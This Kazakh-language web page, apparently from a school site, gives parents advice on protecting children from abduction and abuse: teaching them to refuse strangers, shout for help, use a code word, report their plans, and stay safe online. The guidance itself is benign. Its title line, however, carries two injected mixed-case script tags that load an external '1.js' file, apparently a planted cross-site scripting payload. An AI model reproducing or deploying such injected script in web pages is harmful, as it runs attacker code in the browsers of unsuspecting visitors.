Ата-аналарға арналған жадынама<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

16.02.2024

«Бала зорлық-зомбылықтың құрбаны болмау үшін не істеуі керек»

🔗Балаға ересек адамдардан қауіп төнген жағдайда «ЖОҚ» деп айтуды үйретіңіз.

🔖Егер біреу оны ұстауға әрекет етсе, балаға «Бұл менің әкем емес (анам емес)»деп даусын шығарып айқайлауды үйретіңіз. Бұл айналасындағылардың назарын аудартады және қылмыскерді қаймықтырады.

🔖Балаға қайда баратынын, қай бағытпен, қай уақытта қайтатынын, кіммен болатынын хабарлап, егерде жоспары өзгеріп жатса қоңырау шалу қажет екенін үйретіңіз.

🔖Баланы балабақшадан және мектептен өзіңіз алуға тырысыңыз. Егер басқа біреу алатын болса, алдын ала ескертіңіз.

🔖Балаға құпия сөз ойлап табыңыз. Бұл білмеген бөтен адамдармен бірге кетпеуі немесе бөтен көлікке отырмауы үшін керек.

🔖Балаға жалғыз жүргеннен гөрі достарымен бірге қыдыру қауіпсіз екенін жеткізіңіз. Жалғыз қыдырған бала қылмыскердің назарын өзіне аудартады.

🔖Баланы жылына бір рет фото суретке түсіріңіз. Тым болмағанда сізде жаңа фото суреті болады.

🔖Балалардың интернетте еркін отыруына жол бермеңіз.Баланың әлеуметтік желідегі өміріне белсенеат салысыңыз.

🔖Балаға интернет желісіндегі қауіптілік туралы айтып ескертіңіз. Егер бала басқа интернет қолданушы келең сіздікке немесе зорлық-зомбылыққа тап болған жағдайда, оған дереу жақын адамдарына хабарлау керектігін түсіндіріңіз.

🔖Бала барлық жағдайды айтып жеткізе алатын ата-ананың қатарынан болыңыз.
Бала әрқашан оны жақсы көретініне, егер ол жоғалып кетсе немесе ұрланса, оны іздеу тоқтамайтынына сенімді болуы керек.

Просмотров: 1699


Пікір қосу



Деректерді қолтаңбаға қосу